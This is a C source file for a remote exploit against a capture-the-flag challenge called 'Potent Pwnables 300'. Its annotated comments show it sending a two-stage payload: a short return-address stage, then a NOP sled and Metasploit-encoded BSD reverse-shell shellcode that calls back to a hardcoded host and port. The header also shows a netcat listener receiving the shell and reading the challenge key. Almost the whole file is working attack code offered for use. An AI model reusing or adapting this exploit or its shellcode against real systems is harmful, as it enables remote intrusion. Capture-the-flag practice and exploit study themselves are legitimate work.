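/*
 * 0x82-eat_pwnage300.c - Potent Pwnables 300 remote exploit by x82
 *
 * pwnage300 exploit:
 * --
 * [x82@x0x x82]$ nc -l -p 8282
 * /bin/sh -i
 * sh: can't access tty; job control turned off
 * $ id
 * uid=2002(pwnage300) gid=2002(pwnage300) groups=2002(pwnage300)
 * $ cat /home/pwnage300/key
 * ViAgR@ 4 ur shellcode
 * $ exit
 * [x82@x0x x82]$
 * --
 *
 * Two-stage delivery: a 10-byte first stage, then the encoded reverse-shell
 * payload.  Both stages are sent over a single TCP connection to the
 * host/port given on the command line.
 *
 * NOTE(review): the callback target is NOT a parameter of this program.
 * The second stage was generated with LHOST=221.154.133.30 LPORT=8282
 * baked in (see the comment above `scode`), and the first stage returns
 * into a fixed text address (0x08048e66) of the target binary.  Both must
 * be regenerated for any other listener or any other build of the target;
 * as written, the program only works against the original CTF setup.
 *
 * The header names of the original include block were lost in the copy
 * of this file; they are restored below from the symbols the code uses.
 */
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

/*
 * Write all `len` bytes of `buf` to `fd`, retrying on short sends and EINTR.
 * send() may transmit fewer bytes than requested; an exploit payload that is
 * cut short silently fails in confusing ways, so never ignore the count.
 * Returns 0 when everything was written, -1 on error (errno set by send()).
 */
static int send_all(int fd, const unsigned char *buf, size_t len)
{
    size_t off = 0;

    while (off < len) {
        ssize_t n = send(fd, buf + off, len - off, 0);
        if (n < 0) {
            if (errno == EINTR) {
                continue;
            }
            return -1;
        }
        if (n == 0) {
            /* Should not happen for len > 0; treat as a broken connection. */
            return -1;
        }
        off += (size_t)n;
    }
    return 0;
}

/*
 * Parse a decimal TCP port from `s`.  Returns the port (1..65535) or -1 if
 * the string is not a complete number in that range.  strtol is used instead
 * of atoi so that garbage such as "80x" or an empty string is rejected rather
 * than silently becoming port 80 or port 0.
 */
static int parse_port(const char *s)
{
    char *end = NULL;
    long v;

    errno = 0;
    v = strtol(s, &end, 10);
    if (end == s || *end != '\0' || errno == ERANGE || v < 1 || v > 65535) {
        return -1;
    }
    return (int)v;
}

/*
 * Entry point.  Usage: <prog> [host] [port]
 *
 * Resolves `host`, connects to `port`, sends the first stage and then the
 * reverse-shell stage, and closes the socket.  Exit status is EXIT_FAILURE
 * on usage, resolution, socket, connect or send errors, 0 otherwise.
 */
int main(int argc, char *argv[])
{
    /*
     * Stage 1: 10 bytes.  Author's annotation of what it does on the target:
     *
     *   0x08048e66: pushl 0xfffffff8(%ebp)
     *   0x08048e69: pushl 0x8(%ebp)
     *   0x08048e6c: call  8048a18        read(sock,0x0804600,10);
     *
     * (Annotation copied from the original; it cannot be verified from this
     * file alone.)
     */
    static const unsigned char janmury[] =
        "\x50"                      /* push %eax                */
        "\x68\x66\x8e\x04\x08"      /* push $0x08048e66         */
        "\xc3"                      /* ret (pop %eip)           */
        "\x82\x82\x82";             /* pad                      */

    /*
     * Stage 2: 16-byte NOP sled followed by the encoded payload.
     * bsd_ia32_reverse - LHOST=221.154.133.30 LPORT=8282 Size=92
     * Encoder=PexFnstenvSub  http://metasploit.com
     */
    static const unsigned char scode[] =
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x29\xc9\x83\xe9\xef\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x0b"
        "\xe2\x2e\xc3\x83\xeb\xfc\xe2\xf4\x61\x83\x76\x5a\x59\xa0\x7c\x81"
        "\x59\x8a\xf3\x59\x8e\xfc\xe3\x43\x63\xf2\x2c\xe3\x51\x6b\xcf\xa9"
        "\x1b\xb3\x7e\x92\x9c\x88\x4c\x9b\xc6\x62\x44\xc1\x52\x52\x74\x92"
        "\x5c\xb3\xe3\x43\x42\x9b\xd8\x93\x63\xcd\x01\xb0\x63\x8a\x01\xa1"
        "\x62\x8c\xa7\x20\x5b\xb6\x7d\x90\xbb\xd9\xe3\x43";

    /*
     * Payload lengths come from sizeof, not strlen: strlen would stop at the
     * first 0x00 byte if a payload ever contained one (and takes a char *,
     * not an unsigned char *).  The "- 1" drops the literal's terminating NUL.
     */
    const size_t janmury_len = sizeof janmury - 1;
    const size_t scode_len = sizeof scode - 1;

    struct hostent *se;
    struct sockaddr_in saddr;
    int sock;
    int port;

    printf("\nPotent Pwnables 300 remote exploit by x82\n\n");

    if (argc < 3) {
        printf("Usage: %s [host] [port]\n", argv[0]);
        exit(EXIT_FAILURE);
    }

    port = parse_port(argv[2]);
    if (port < 0) {
        fprintf(stderr, "invalid port: %s\n", argv[2]);
        return EXIT_FAILURE;
    }

    se = gethostbyname(argv[1]);
    /* Only an IPv4 answer fits sockaddr_in; anything else is unusable here. */
    if (se == NULL || se->h_addrtype != AF_INET ||
        se->h_length != (int)sizeof saddr.sin_addr || se->h_addr_list[0] == NULL) {
        fprintf(stderr, "could not resolve %s to an IPv4 address\n", argv[1]);
        return EXIT_FAILURE;
    }

    sock = socket(AF_INET, SOCK_STREAM, 0);
    if (sock == -1) {
        perror("socket");
        return EXIT_FAILURE;
    }

    memset(&saddr, 0, sizeof saddr);
    saddr.sin_family = AF_INET;
    saddr.sin_port = htons((unsigned short)port);
    memcpy(&saddr.sin_addr, se->h_addr_list[0], sizeof saddr.sin_addr);

    if (connect(sock, (struct sockaddr *)&saddr, sizeof saddr) == -1) {
        perror("connect");
        close(sock);
        return EXIT_FAILURE;
    }

    /*
     * The original carried a disabled sleep(10) here; re-enable a delay if the
     * target needs time between accept() and the first read.
     */

    if (send_all(sock, janmury, janmury_len) == -1) {
        perror("send (stage 1)");
        close(sock);
        return EXIT_FAILURE;
    }
    if (send_all(sock, scode, scode_len) == -1) {
        perror("send (stage 2)");
        close(sock);
        return EXIT_FAILURE;
    }

    close(sock);
    return 0;
}
/* eoc */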